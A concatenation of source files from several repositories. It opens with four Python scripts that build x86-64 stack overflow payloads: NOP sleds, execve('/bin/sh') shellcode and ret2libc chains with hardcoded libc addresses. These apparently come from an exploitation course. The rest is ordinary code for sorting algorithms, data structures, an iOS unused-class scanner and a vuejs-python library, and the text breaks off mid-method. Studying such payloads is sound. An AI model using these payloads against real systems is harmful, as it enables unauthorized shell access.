# Emit a RIP-overwrite probe payload on stdout: 512 NOP bytes to fill the
# vulnerable buffer, 8 filler bytes for the saved RBP, then a recognizable
# marker value where the saved return address lives.
import struct
import sys

buffsize = 512
offset = 0

padding = b'\x90' * buffsize                         # fills the buffer
saved_rbp = b'\x90' * 8                              # clobbers saved RBP
marker_rip = struct.pack("<Q", 0xdeadbeefdeadbeef)   # shows up in the crash

sys.stdout.buffer.write(padding + saved_rbp + marker_rip)
|
bplinux/asm | examples/x64/03/control_rip.py | #!/usr/bin/python
import struct
import sys
# ret2libc payload: pad through the buffer and saved RBP area, then return
# into libc's system() with the address of the "/bin/sh" string after it.
buffsize = 512
offset = 0
# libc addresses observed in the target process (ASLR disabled):
#system: 0x7ffff7e19120
#exit: 0x7ffff7e0e820
#/bin/sh: 0x7ffff7f5b966
#/bin/sh
#sc = b'\xeb\x14\x5f\x48\x31\xc0\x88\x47\x07\x50\x57\x48\x8d\x34\x24\xb0\x3b\x48\x31\xd2\x0f\x05\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'
nopsled = b'\x90'*(buffsize)
system = struct.pack("<Q", 0x7ffff7e19120)  # address of system() in libc
binsh = struct.pack("<Q", 0x7ffff7f5b966)   # address of "/bin/sh" in libc
sys.stdout.buffer.write(nopsled+system+binsh)
|
bplinux/asm | scripts/control_eip.py | <gh_stars>0
#!/usr/bin/python
# ret2libc-style payload built from raw 6-byte little-endian addresses (the
# two high bytes of these x86-64 user-space addresses are zero and omitted).
import struct
import sys
buffsize = 512
offset = 0
#system(): 0x7ffff7e1d120
#exit(): 0x7ffff7e12820
#"/bin/sh": 0x7ffff7f5f966
padding = b'\x90'*(buffsize)
ebp = b'\x90'*8
eip = b'\x20\xd1\xe1\xf7\xff\x7f'     # 0x7ffff7e1d120 -> system(), see above
garbage = b'\x90'*8                   # filler slot following the return address
string = b'\x66\xf9\xf5\xf7\xff\x7f'  # 0x7ffff7f5f966 -> "/bin/sh", see above
sys.stdout.buffer.write(padding+ebp+eip+garbage+string)
|
bplinux/asm | examples/x64/02/control_rip.py | #!/usr/bin/python
import struct
import sys
# Single-shot overflow payload on stdout: NOP sled + execve("/bin/sh")
# shellcode + padding, with the saved return address pointing into the sled.
buffsize = 512
offset = 0
#/bin/sh
sc = b'\xeb\x14\x5f\x48\x31\xc0\x88\x47\x07\x50\x57\x48\x8d\x34\x24\xb0\x3b\x48\x31\xd2\x0f\x05\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'
nopsled1 = b'\x90'*(buffsize-len(sc)-8)  # sled before the shellcode
nopsled2 = b'\x90'*8
rbp = b'\x90'*8                          # filler for the saved base pointer
rip = struct.pack("<Q", 0x7fffffffe958)  # little-endian address inside the sled
sys.stdout.buffer.write(nopsled1+sc+nopsled2+rbp+rip)
|
devhoodit/dataStructure-and-algorithm | src/dataStructure/python/tab2space.py | <reponame>devhoodit/dataStructure-and-algorithm<filename>src/dataStructure/python/tab2space.py
# One-shot fixer: rewrite ds.py in place, replacing every hard tab with the
# replacement string in the literal below.
tmp = []
with open('ds.py','r') as f:
    for line in f.readlines():
        tmp.append(line.replace('\t', ' '))
with open('ds.py', 'w') as f:
    f.writelines(tmp)
devhoodit/dataStructure-and-algorithm | src/algorithm/sort.py | import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from dataStructure.python import ds
"""
sorting examples
comparison sort
-bubble sort
-quick sort
selection sort
-selection sort
merge sort
-merge sort
"""
"""
bubble sort
1. take first value, first step n = 0
2. compare with next value, if current value is bigger than next value then swap
3. repeat 1-2 step (list length - n - 1) times
4. n += 1
5. repeat 1-4 step (list length) times
"""
def bubble_sort(arr):
    """Sort *arr* in place with bubble sort (returns None, like list.sort)."""
    n = len(arr)
    for done in range(n):
        # After each pass the largest remaining value has bubbled to the
        # end, so the scanned range shrinks by one element per pass.
        for k in range(n - done - 1):
            if arr[k] > arr[k + 1]:
                arr[k], arr[k + 1] = arr[k + 1], arr[k]
"""
quick sort
Ref) https://ko.wikipedia.org/wiki/%ED%80%B5_%EC%A0%95%EB%A0%AC - pseudocode
1. set random pivot
2. divide list base on pivot value
3. repeat 1-2 step until list length become 1 using recursive
4. return list and concatenate
"""
"""
using more memory(make additional list)
"""
def _quick_sort(arr):
less, greater = [], []
if len(arr) <= 1:
return arr
pivot = arr.pop(len(arr)//2)
for index in arr:
if pivot < index:
greater.append(index)
else:
less.append(index)
return _quick_sort(less) + [pivot] + _quick_sort(greater)
"""
using only one list(need less memory)
1. set random pivot
2. divide base on pivot value in current range -> partition
3. recursive(pass right and left range)
4. repeat 1-3 step until arr no more need to divide
"""
def quick_sort(arr):
    """Sort *arr* in place (quicksort, Lomuto partition, middle pivot) and
    return the same list."""

    def _partition(lo, hi):
        # Choose the middle element, park it at the right edge, then sweep
        # everything <= pivot to the left side of the range.
        mid = (lo + hi) // 2
        pivot = arr[mid]
        arr[mid], arr[hi] = arr[hi], arr[mid]
        boundary = lo
        for k in range(lo, hi):
            if arr[k] <= pivot:
                arr[k], arr[boundary] = arr[boundary], arr[k]
                boundary += 1
        # Put the pivot into its final slot.
        arr[boundary], arr[hi] = arr[hi], arr[boundary]
        return boundary

    def _sort(lo, hi):
        if hi > lo:
            split = _partition(lo, hi)
            _sort(lo, split - 1)
            _sort(split + 1, hi)

    _sort(0, len(arr) - 1)
    return arr
"""
selection sort
1. find min value index in range( n ~ list length - 1), first try n = 0
2. swap(min value index, n)
3. repeat 1-2 step (list length) times
"""
def selection_sort(arr):
    """Sort *arr* in place with selection sort and return it.

    Each pass finds the smallest remaining element in arr[i:] and swaps it
    into position i.  (The previous version named its index ``min``,
    shadowing the builtin; renamed to ``smallest``.)
    """
    n = len(arr)
    for i in range(n):
        smallest = i
        for j in range(i + 1, n):
            if arr[j] < arr[smallest]:
                smallest = j
        arr[smallest], arr[i] = arr[i], arr[smallest]
    return arr
"""
heap sort
"""
def heap_sort(arr):
    """Sort *arr* in place with heap sort and return it.

    Replaces the previous empty stub.  Builds a max-heap over the list
    (0-indexed, children of i at 2i+1 / 2i+2), then repeatedly swaps the
    root to the end of the shrinking unsorted region and restores the heap.
    """
    def _sift_down(root, end):
        # Push arr[root] down until the heap property holds in arr[root..end].
        while True:
            child = 2 * root + 1
            if child > end:
                return
            if child + 1 <= end and arr[child] < arr[child + 1]:
                child += 1  # pick the larger child
            if arr[root] < arr[child]:
                arr[root], arr[child] = arr[child], arr[root]
                root = child
            else:
                return

    n = len(arr)
    for start in range(n // 2 - 1, -1, -1):
        _sift_down(start, n - 1)
    for end in range(n - 1, 0, -1):
        arr[0], arr[end] = arr[end], arr[0]
        _sift_down(0, end - 1)
    return arr
"""
merge sort
1. divide array until all array size = 1
2. merge two array. sort, (already each of arrays sorted, compare only first element of each array)
"""
def merge_sort(arr):
    """Sort *arr* in place with top-down merge sort and return it."""

    def _merge(lo, mid, hi):
        # Merge the two already-sorted halves arr[lo..mid] and arr[mid+1..hi]
        # into a scratch list, then copy the result back over the segment.
        merged = []
        a, b = lo, mid + 1
        while a <= mid and b <= hi:
            if arr[a] < arr[b]:
                merged.append(arr[a])
                a += 1
            else:
                merged.append(arr[b])
                b += 1
        # Exactly one side has leftovers; the other slice is empty.
        merged.extend(arr[a:mid + 1])
        merged.extend(arr[b:hi + 1])
        arr[lo:lo + len(merged)] = merged

    def _sort(lo, hi):
        if lo < hi:
            mid = (lo + hi) // 2
            _sort(lo, mid)
            _sort(mid + 1, hi)
            _merge(lo, mid, hi)

    _sort(0, len(arr) - 1)
    return arr
def sort(method):
    # Interactive driver: read whitespace-separated integers from stdin, one
    # line at a time; after every line, re-sort everything seen so far with
    # *method* and print the result.  An empty line (falsy) ends the loop.
    # NOTE(review): EOF (Ctrl-D) raises an uncaught EOFError here instead of
    # ending cleanly — confirm intended.
    origin_data = []
    while input_data := input():
        try:
            input_numbers = map(int, input_data.split())
            origin_data += input_numbers
            origin_data = method(origin_data)
            print(*origin_data)
        except Exception as e:
            # Bad input (non-integers) is reported and skipped.
            print(e)
sort(merge_sort)
devhoodit/dataStructure-and-algorithm | src/dataStructure/python/ds.py | from collections.abc import Sequence
from queue import Empty
class Stack():
    """Bounded LIFO stack backed by a growing Python list."""

    def __init__(self, length):
        self.stack = []
        self.max_length = length  # capacity limit enforced by push()

    def __len__(self):
        return len(self.stack)

    def is_full(self):
        return len(self.stack) >= self.max_length

    def is_empty(self):
        return not self.stack

    def push(self, data):
        """Add *data* on top; raises IndexError when the stack is full."""
        if self.is_full():
            raise IndexError("stack overflow")
        self.stack.append(data)

    def pop(self):
        """Remove and return the top item; raises IndexError when empty."""
        if self.is_empty():
            raise IndexError("stack underflow")
        return self.stack.pop()
class ArrayStack():
    """Bounded LIFO stack over a fixed-size, preallocated list."""

    def __init__(self, length):
        self.stack = [None] * length
        self.max_length = length
        self.cur_pos = 0  # index of the next free slot

    def __len__(self):
        return self.cur_pos

    def is_full(self):
        return self.cur_pos >= self.max_length

    def is_empty(self):
        return self.cur_pos == 0

    def push(self, data):
        """Store *data* in the next free slot; IndexError when full."""
        if self.is_full():
            raise IndexError("stack overflow")
        self.stack[self.cur_pos] = data
        self.cur_pos += 1

    def pop(self):
        """Remove and return the top item; IndexError when empty."""
        if self.is_empty():
            raise IndexError("stack underflow")
        self.cur_pos -= 1
        item = self.stack[self.cur_pos]
        self.stack[self.cur_pos] = None  # drop the reference
        return item
class Heap():
    # NOTE(review): this outer class wraps an inner class of the same name —
    # it looks like an accidental duplication (MaxHeap/MinHeap below inherit
    # the OUTER Heap, which defines no __init__, so their pushes would hit a
    # missing self.heap).  Confirm the intended nesting.
    class Heap():
        """1-indexed binary heap base: index 0 holds a None sentinel."""
        def __init__(self):
            self.heap = [None]  # sentinel at slot 0; elements live at 1..size
            self.size = 0
        def __len__(self):
            return self.size
        def __iter__(self):
            # Iterating drains the heap: each step pops the root.
            return self
        def __next__(self):
            # Relies on a subclass-provided pop().
            if self.size <= 0:
                raise StopIteration
            return self.pop()
        def is_empty(self):
            return self.size <= 0
class MaxHeap(Heap):
    """Max-heap over a 1-indexed list (index 0 is a sentinel).

    Assumes the base class provides ``self.heap`` (list with a sentinel at
    index 0), ``self.size`` and ``is_empty()``.
    """

    def push(self, value):
        """Append *value* and sift it up while it exceeds its parent."""
        self.heap.append(value)
        self.size += 1
        i = self.size
        while i != 1 and value > self.heap[i//2]:
            self.heap[i], self.heap[i//2] = self.heap[i//2], self.heap[i]
            i //= 2

    def pop(self):
        """Remove and return the maximum (root); IndexError when empty."""
        if self.is_empty():
            raise IndexError()
        tmp = self.heap[1]
        # Move the last leaf into the root slot, then sift it down.
        self.heap[1] = self.heap[-1]
        self.heap.pop()
        self.size -= 1
        parent = 1
        child = 2
        while child <= self.size:
            # The right child sits at child+1 and is valid whenever
            # child+1 <= size.  (The original tested 'child+1 < size',
            # skipping the last slot and breaking the heap property.)
            if child+1 <= self.size and self.heap[child] < self.heap[child+1]:
                child += 1
            if self.heap[child] > self.heap[parent]:
                self.heap[child], self.heap[parent] = self.heap[parent], self.heap[child]
            else:
                break
            parent = child
            child *= 2
        return tmp
class MinHeap(Heap):
    """Min-heap counterpart of MaxHeap (1-indexed list, sentinel at 0)."""

    def push(self, value):
        """Append *value* and sift it up while it is below its parent."""
        self.heap.append(value)
        self.size += 1
        i = self.size
        while i != 1 and value < self.heap[i//2]:
            self.heap[i], self.heap[i//2] = self.heap[i//2], self.heap[i]
            i //= 2

    def pop(self):
        """Remove and return the minimum (root); IndexError when empty."""
        if self.is_empty():
            raise IndexError()
        tmp = self.heap[1]
        self.heap[1] = self.heap[-1]
        self.heap.pop()
        self.size -= 1
        parent = 1
        child = 2
        # The last valid index is self.size, so both the loop bound and the
        # right-child check use '<='.  (The original used '<' for both,
        # skipping the final element and leaving the heap order violated.)
        while child <= self.size:
            if child+1 <= self.size and self.heap[child] > self.heap[child+1]:
                child += 1
            if self.heap[child] < self.heap[parent]:
                self.heap[child], self.heap[parent] = self.heap[parent], self.heap[child]
            else:
                break
            parent = child
            child *= 2
        return tmp
class Queue():
    """Unbounded FIFO queue backed by a plain list (dequeue is O(n))."""

    def __init__(self) -> None:
        self.queue = []

    def __len__(self):
        return len(self.queue)

    def is_empty(self):
        return not self.queue

    def enqueue(self, data):
        """Add *data* at the back."""
        self.queue.append(data)

    def dequeue(self):
        """Remove and return the front item; raises queue.Empty when empty."""
        if self.is_empty():
            raise Empty('Queue is empty')
        return self.queue.pop(0)

    def first(self):
        """Return (without removing) the front item; queue.Empty when empty."""
        if self.is_empty():
            raise Empty('Queue is empty')
        return self.queue[0]
class ArrayQueue():
    """Circular-buffer FIFO queue that doubles its storage when full."""

    def __init__(self, length=10):
        self.queue = [None] * length
        self.length = length  # current capacity
        self.f = 0            # index of the front element
        self.size = 0         # number of stored elements

    def __len__(self):
        return self.size

    def _is_full(self):
        return self.size >= self.length

    def _resize(self):
        # Unroll the circular contents into the front of a buffer twice
        # as large, then reset the front pointer.
        bigger = [None] * (self.length * 2)
        src = self.f
        for dst in range(self.length):
            bigger[dst] = self.queue[src]
            src = (src + 1) % self.length
        self.queue = bigger
        self.f = 0
        self.length *= 2

    def is_empty(self):
        return self.size == 0

    def enqueue(self, data):
        """Add *data* at the back, growing the buffer if needed."""
        if self._is_full():
            self._resize()
        self.queue[(self.f + self.size) % self.length] = data
        self.size += 1

    def dequeue(self):
        """Remove and return the front item; raises queue.Empty when empty."""
        if self.is_empty():
            raise Empty("Queue is empty")
        item = self.queue[self.f]
        self.queue[self.f] = None  # drop the reference
        self.f = (self.f + 1) % self.length
        self.size -= 1
        return item
class Tree:
    # Placeholder: tree implementation not written yet.
    def __init__(self):
        pass
class Node:
    # NOTE(review): the outer class appears to act as a namespace for the two
    # node types below (it is referenced elsewhere as Node.Node / Node.dNode);
    # the duplicated inner name looks accidental — confirm.
    class Node:
        """Singly linked node; iterating a node walks the chain from it."""
        def __init__(self, data, link=None):
            self.data = data
            self.link = link  # next node, or None at the tail
        def __iter__(self):
            self.cursor = self
            return self
        def __next__(self):
            if self.cursor == None:
                raise StopIteration
            else:
                tmp = self.cursor.data
                self.cursor = self.cursor.link
                return tmp
        def push(self, data):
            # Walk to the tail and append a new node there.
            # NOTE(review): class bodies do not nest scopes, so at runtime
            # 'Node' here resolves to the OUTER Node class (which takes no
            # constructor args) — likely should be Node.Node(data); confirm.
            link = self
            while link.link != None:
                link = link.link
            tmp = Node(data)
            link.link = tmp
    class dNode:
        """Doubly linked node with left/right neighbour references."""
        def __init__(self, data, left_link=None, right_link=None):
            self.data = data
            self.left_link = left_link
            self.right_link = right_link
class LinkedList:
    # NOTE(review): outer wrapper mirrors the Node namespace pattern above;
    # confirm the duplication is intentional.
    class LinkedList(Node.Node):
        def __init__(self):
            # Overrides Node.Node.__init__ without setting data/link, so a
            # fresh LinkedList has neither attribute until something assigns
            # them — NOTE(review): verify this is the intended behaviour.
            pass
class DoubleLinkedList():
    """Doubly linked list built from Node.dNode elements.

    The original append() walked its cursor past the tail (to None) and then
    dereferenced it, and pop() used a nonexistent ``.link`` attribute and
    never updated ``length``.  Same interface, corrected linking.
    """

    def __init__(self):
        self.length = 0
        self.link = None  # head node (Node.dNode) or None when empty

    def __len__(self):
        return self.length

    def append(self, data):
        """Add *data* at the tail."""
        node = Node.dNode(data)
        if self.link is None:
            self.link = node
        else:
            tail = self.link
            while tail.right_link:
                tail = tail.right_link
            node.left_link = tail
            tail.right_link = node
        self.length += 1

    def pop(self, n):
        """Unlink the *n*-th node (0-based from the head) and return its data."""
        cursor = self.link
        for _ in range(n):
            cursor = cursor.right_link
        if cursor.left_link is None:
            # Removing the head: its successor becomes the new head.
            self.link = cursor.right_link
        else:
            cursor.left_link.right_link = cursor.right_link
        if cursor.right_link is not None:
            cursor.right_link.left_link = cursor.left_link
        self.length -= 1
        return cursor.data
|
Olincy/iOS-Unused-Classes-Tool | unused_classes.py | <reponame>Olincy/iOS-Unused-Classes-Tool<gh_stars>1-10
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import sys,os,re
# Class-declaration pattern: ^[ ]*@interface[ ]+([a-zA-Z_][\w]+)[ ]*:
# Class-usage pattern: (?:[<]*([A-Z_][\w]+)[ ]+\*[>]*)|(?:.*\[[ ]*([A-Z_][\w]+)[ ].*\])|(?:[:][ ]*([A-Z_][\w]+))
CLASS_NAME_KEY = "CLASS_NAME_KEY"
CLASS_COUNT_KEY = "CLASS_COUNT_KEY"
SCAN_CLASS_DEF= "SCAN_CLASS_DEF" # scan pass 1: collect declared class names
SCAN_CLASS_USE = "SCAN_CLASS_USE" # scan pass 2: strike out classes that are used
# Candidate class names; filled by pass 1, pruned by pass 2.
temp_classes = []
def match_class(line, regex, scan_type):
    """Scan one source line with *regex* and update the global temp_classes.

    In SCAN_CLASS_DEF mode every captured class name is recorded; otherwise
    a captured (i.e. used) class name is removed from the candidate list.
    """
    matches = re.finditer(regex, line, re.MULTILINE)
    for matchNum, match in enumerate(matches, start=1):
        for groupNum in range(0, len(match.groups())):
            groupNum = groupNum + 1
            group_value = match.group(groupNum)
            if group_value is None:
                # The usage regex is a set of alternatives, so only one group
                # participates per match.  The original stringified the rest
                # to the literal "None" instead of skipping them.
                continue
            matched_class = "{group}".format(group = group_value)
            if scan_type == SCAN_CLASS_DEF:
                temp_classes.append(matched_class)
            else:
                for item in temp_classes[:]:
                    if matched_class == item:
                        temp_classes.remove(item)
def walk_files(scan_type, dirname, names):
    # os.path.walk visitor (Python 2): scan every .h/.m/.mm file under
    # dirname line by line, feeding each line to match_class().
    # Skip files inside CocoaPods directories.
    if dirname.endswith("/Pods") or ("/Pods/" in dirname):
        return;
    # Skip files inside .framework bundles.
    if dirname.endswith(".framework") or (".framework/" in dirname):
        return;
    for file in names:
        # if file.startswith("TC"): # filter by class-name prefix
        file_path = ("%s/%s"%(dirname,file))
        if os.path.isfile(file_path):
            file_name = os.path.splitext(file)[0]
            file_type = os.path.splitext(file)[-1]
            if file_type in ('.h','.m','.mm'):
                print "checking file:",file
                f = open(file_path)
                for line in f:
                    regex = ""
                    if scan_type == SCAN_CLASS_DEF:# match class declarations
                        regex = r"^[ ]*@interface[ ]+([a-zA-Z_][\w]+)[ ]*:"
                    else: # match class usages
                        regex = r"(?:[<]*([A-Z_][\w]+)[ ]+\*[>]*)|(?:.*\[[ ]*([A-Z_][\w]+)[ ].*\])|(?:[:][ ]*([A-Z_][\w]+))"
                    match_class(line,regex,scan_type)
                f.close()
def check(dir):
    # Run both scan passes over *dir* and write unused_classes_report.txt
    # into the (changed-to) working directory.
    # NOTE(review): os.path.walk exists only in Python 2.
    try:
        os.chdir(dir)
    except Exception as e:
        print e
        sys.exit(2)
    else:
        print 'change to dir:',os.getcwd()
        print "---------begin-------\n"
        print "checking defined classes:\n"
        # Pass 1: fill temp_classes with every declared class.
        os.path.walk(dir, walk_files, SCAN_CLASS_DEF)
        # print "\n====== here is the defined classes({num}) ======\n".format(num=len(temp_classes))
        # for class_key in temp_classes:
        # print class_key
        print "now checking unused classes:\n"
        # Pass 2: remove every class that appears to be used anywhere.
        os.path.walk(dir, walk_files, SCAN_CLASS_USE)
        header = "\n====== here is the unused classes ======\n"
        print header
        f = open("unused_classes_report.txt","w")
        f.write(header)
        for class_key in temp_classes:
            print class_key
            f.write(class_key+'\n')
        f.write("\nTotal count:{num}\n".format(num=len(temp_classes)))
        f.close()
        print "\n---------complete(total count:{num})---------\n".format(num=len(temp_classes))
        print "A report file is generated in: {dir}".format(dir=os.getcwd())
        print 'use "cat {dir}/unused_classes_report.txt"\n'.format(dir=os.getcwd())
    finally:
        pass
def main(argv):
dir = argv[0]
if len(argv) > 1:
print "usage: python unused_classes.py <your-project-directory>"
sys.exit()
elif len(argv) <= 0:
dir = '.'
# print "check in current directory。"
# else:
# print 'check in directory:',dir
check(dir)
if __name__ == "__main__":
main(sys.argv[1:]) |
twitwi/vuejs-python | vuejspython/observablecollections/observable.py | import types
from .event import Event
class Observable:
    """Minimal observer-pattern subject: callables register themselves here
    and receive an Event object each time raiseEvent() fires."""

    def __init__(self):
        self.observers = set()

    def attach(self, observer):
        """Register *observer*; attaching twice is a no-op."""
        if observer not in self.observers:
            self.observers.add(observer)

    def detach(self, observer):
        """Unregister *observer* if it is currently attached."""
        if observer in self.observers:
            self.observers.remove(observer)

    def raiseEvent(self, name, **kwargs):
        """Build an Event named *name* carrying *kwargs* as extra attributes
        and hand it to every attached observer."""
        event = Event(name, self)
        for attr, value in kwargs.items():
            setattr(event, attr, value)
        for callback in self.observers:
            callback(event)
|
twitwi/vuejs-python | examples/example-3.py | <filename>examples/example-3.py
import asyncio
from vuejspython import model, start
@model
class Comp:
    """vuejspython demo: a chain of computed properties derived from `i`."""
    # define properties to forward to vue (or not)
    i = 42
    j = 111
    def __init__(self):
        self.i = 1
    # computed_<name> methods are exposed as reactive computed properties.
    def computed_i_squared(self): return self.i**2
    def computed_i_mod2(self): return self.i%2
    def computed_odd(self): return self.i_mod2 == 1
    def computed_even(self): return not self.odd
    def computed_iorisquared(self): return self.i if self.odd else self.i_squared
    def computed_iorj(self): return self.i if self.even else self.j
    def computed_loopy(self): return self.iorisquared # + self.loopy2 # causes recursion error
    def computed_loopy2(self): return self.iorj + self.loopy
    async def demo_incr(self, t, v):
        # Periodically bump `i` to drive the reactive updates.
        while True:
            await asyncio.sleep(t)
            self.i += v
    async def meth1(self, v):
        print("Com", v)
        self.subtitle = "Changed: "+v # will not trigger change as _novue
        if v == '+1':
            self.i += 1
        #await self._up('i')
start(Comp())
|
twitwi/vuejs-python | vuejspython/observablecollections/event.py | <filename>vuejspython/observablecollections/event.py
class Event:
    """Record of a collection mutation: an action name plus the raising object.

    Extra payload attributes are set on instances by Observable.raiseEvent().
    """

    def __init__(self, action, source):
        self._action = action
        self._source = source

    @property
    def action(self):
        """Name of the action that produced this event."""
        return self._action

    @property
    def source(self):
        """The object that raised the event."""
        return self._source
twitwi/vuejs-python | examples/example-6.py | <reponame>twitwi/vuejs-python
import asyncio
from vuejspython import model, start, atomic
import numpy as np
import matplotlib.pyplot as plt
import io
@model
class Comp:
    """Nearest-neighbour score demo over numpy grids: distance ratio of each
    grid point to the closest "minus" vs "plus" sample."""
    # define properties to forward to vue (or not)
    im = np.zeros((1,))
    xp = np.zeros((1,))
    yp = np.zeros((1,))
    xm = np.zeros((1,))
    ym = np.zeros((1,))
    _v_nobroadcast = ['d1m', 'd1p']
    def __init__(self):
        self.draw_set2pluses()
        self.draw_dataset()
    def computed_xmin(self): return self.x.min()
    def computed_xmax(self): return self.x.max()
    def computed_dx(self): return (self.x.max() - self.x.min()) / (np.prod(self.x.shape)-1)
    def computed_ymin(self): return self.y.min()
    def computed_ymax(self): return self.y.max()
    def computed_dy(self): return (self.y.max() - self.y.min()) / (np.prod(self.y.shape)-1)
    # Distance from every grid point to its closest minus / plus sample.
    def computed_d1m(self): return np.min( ((self.x-self.xm)**2 + (self.y-self.ym)**2)**0.5, axis=2)
    def computed_d1p(self): return np.min( ((self.x-self.xp)**2 + (self.y-self.yp)**2)**0.5, axis=2)
    def computed_im(self): return np.transpose(self.d1m / (self.d1p+.0001))
    @atomic
    def draw_dataset(self):
        # Grid axes plus a random crescent of "minus" samples.
        self.x = np.linspace(-1.3, 1.3, 191)[:, None, None]
        self.y = np.linspace(-0.87, 0.87, 203)[None, :, None]
        rangle = np.random.uniform(0, np.pi*4/3, (1, 1, 300))
        rradius = np.random.uniform(1, 1.7, rangle.shape)
        self.xm = rradius * np.cos(rangle)
        self.ym = rradius*4/6 * np.sin(rangle)
    @atomic
    def draw_bonedataset(self, t='bone', N=300):
        # Sample N "minus" points from a bone- or ellipse-shaped region.
        x = np.linspace(-1.3, 1.3, 1000)[:,None]
        y = np.linspace(-0.6, 0.6, 600)[None,:]
        if t == 'bone':
            candidate = (y/0.5)**2 + (x)**2 > 1
            candidate |= ((y-0.5)/0.4)**2 + (x/0.5)**2 < 1
            candidate |= ((y+0.5)/0.4)**2 + (x/0.5)**2 < 1
        else:
            candidate = (y/0.5)**2 + (x)**2 > 1
        candx,candy = np.where(candidate)
        candind = np.random.choice(range(candx.shape[0]), N, replace=False)
        self.xm = x[None,None,candx[candind],0]
        self.ym = y[None,None,0,candy[candind]]
    @atomic
    def draw_set2pluses(self):
        # Two fixed "plus" anchor points.
        self.xp = np.array([0, 0.75])[None,None,:]
        self.yp = np.array([0, 0])[None,None,:]
    @atomic
    def draw_somepluses(self, N=20):
        # N random "plus" points inside the current grid bounds.
        self.xp = np.random.uniform(self.xmin, self.xmax, (1,1,N))
        self.yp = np.random.uniform(self.ymin, self.ymax, (1,1,N))
start(Comp())
|
twitwi/vuejs-python | examples/example-0.py |
import vuejspython
from numpy import pi
@vuejspython.model
class App:
    """Circle-area demo: `radius` comes from the UI, `area` is computed."""
    radius = 2
    def computed_area(self):
        # The bound input may transiently hold the empty string while editing.
        if self.radius == "": return 0
        return pi * self.radius ** 2
vuejspython.start(App())
|
twitwi/vuejs-python | examples/example-9.py |
import vuejspython
import numpy as np
@vuejspython.model
class App:
    """Layer-by-layer signal demo: scale, bias, ReLU and log-softmax chained
    as computed properties over a fixed sinusoid."""
    # input = np.random.uniform(-1000, 1000, 10)
    input = 4 + 5*np.sin(np.linspace(-6, 5, 15))
    scale = 1
    bias = 0
    def computed_size(self): return len(self.input)
    def computed_scaled(self):
        return np.array(self.input) * self.scale
    def computed_biased(self):
        return np.array(self.scaled) - self.bias
    def computed_relu(self):
        res = np.copy(self.biased)
        #res[res < self.bias] = self.bias
        res[res < 0] = 0
        return res
    def computed_logsoftmax(self):
        # Softmax over the rectified values, then log (epsilon avoids log(0)).
        smax = np.exp(self.relu)
        smax /= np.sum(smax)
        return np.log(smax + 0.000001)
vuejspython.start(App())
|
twitwi/vuejs-python | vuejspython/serve.py | from aiohttp import web
from pathlib import Path
from glob import glob
from collections import defaultdict
import re
async def index(request):
    # Landing page: list every *.html file below the working directory as a
    # link.  (Exact whitespace inside the HTML template is cosmetic only.)
    index_page = """
<!DOCTYPE html>
<html>
<head>
<title>Vuejspython</title>
<link rel=stylesheet href="/static/picnic.min.css">
<style>
body { margin: 2em; }
</style>
</head>
<body>
<h1>HTML files for Vuejspython</h1>
<ul>
""" + '\n'.join([
        '<li><a href="{}">{}</a></li>'.format(p, p) for p in sorted(glob('**/*.html', recursive=True))
    ]) + """
</ul>
</body>
</html>
"""
    return web.Response(text=index_page, content_type='text/html')
async def patched_html(request):
    # Serve an .html file from the filesystem verbatim.
    # NOTE(review): request.path is used directly as a relative file path —
    # no traversal protection; acceptable for a local dev tool only.
    print("# HTTP, filesystem:", request.path)
    f = request.path
    if f.startswith('/'): f = f[1:]
    with open(f, 'r') as myfile:
        data = myfile.read()
    #data = data.replace(r'src="vuejspython.js"', 'src="/static/vuejspython.js"')
    return web.Response(text=data, content_type='text/html')
# Map file extension -> Content-Type; anything unknown is served as HTML.
type_from_extension = defaultdict(lambda:'text/html')
type_from_extension['css'] = 'text/css'
type_from_extension['js'] = 'text/javascript'
async def embedded_static(request):
    # Serve assets bundled with the package: everything in the request path
    # after ".../lib/" is looked up inside the package's static/ directory.
    print("# HTTP, embedded:", request.path)
    static_dir = Path(__file__).with_name('static')
    f = str(static_dir) + '/' + re.sub(r'.*/lib/', '', request.path)
    with open(f, 'r') as myfile:
        data = myfile.read()
    # Pick the Content-Type from the file extension.
    ext = re.sub(r'.*[.]', '', f)
    ct = type_from_extension[ext]
    return web.Response(text=data, content_type=ct)
def run_http_server(port, host='localhost'):
    # Wire the routes — index page, patched .html files, embedded lib/
    # assets, and a plain static mount over the working directory — then
    # block serving with aiohttp.
    #static_dir = Path(__file__).with_name('static')
    app = web.Application()
    app.router.add_get('/', index)
    app.router.add_get('/{file:.*[.]html}', patched_html)
    app.router.add_get('/{file:.*lib/.*}', embedded_static)
    app.router.add_static('/', '.', show_index=True)
    web.run_app(app, host=host, port=port)
|
twitwi/vuejs-python | vuejspython/observablecollections/observablelist.py | <filename>vuejspython/observablecollections/observablelist.py
from .observable import Observable
class ObservableList(list, Observable):
    """A list that raises itemsAdded / itemsRemoved / itemsUpdated / sorted /
    reversed events (via Observable) on every mutation."""

    def __init__(self, *args, **kwargs):
        Observable.__init__(self)
        list.__init__(self, *args, **kwargs)

    def __iadd__(self, other):
        self.extend(other)
        return self

    def append(self, value):
        index = len(self)
        list.append(self, value)
        self.raiseEvent('itemsAdded', index=index, items=[value])

    def insert(self, index, value):
        list.insert(self, index, value)
        # Clamp so the reported index matches where the item actually landed.
        if index > len(self) - 1:
            index = len(self) - 1
        self.raiseEvent('itemsAdded', index=index, items=[value])

    def __setitem__(self, key, value):
        if (type(key) is slice):
            index = key.start
        else:
            index = key
        oldItem = list.__getitem__(self, key)
        list.__setitem__(self, key, value)
        self.raiseEvent('itemsUpdated', index=index, oldItems=[oldItem], newItems=[value])

    def __delitem__(self, i):
        if isinstance(i, slice):
            index = i.start
        else:
            index = i
        item = list.__getitem__(self, i)
        list.__delitem__(self, i)
        self.raiseEvent('itemsRemoved', items=[item], index=index)

    def extend(self, seq):
        # Materialize first: if *seq* is a one-shot iterator, list.extend()
        # would consume it and the event would then carry an exhausted
        # iterator instead of the added items.
        items = list(seq)
        insertIndex = len(self)
        list.extend(self, items)
        self.raiseEvent('itemsAdded', items=items, index=insertIndex)

    def pop(self, index=-1):
        removedIndex = index
        if (index == -1):
            removedIndex = len(self) - 1
        value = list.pop(self, index)
        self.raiseEvent('itemsRemoved', items=[value], index=removedIndex)
        return value

    def remove(self, obj):
        index = self.index(obj)
        list.remove(self, obj)
        self.raiseEvent('itemsRemoved', items=[obj], index=index)

    def sort(self, **kwargs):
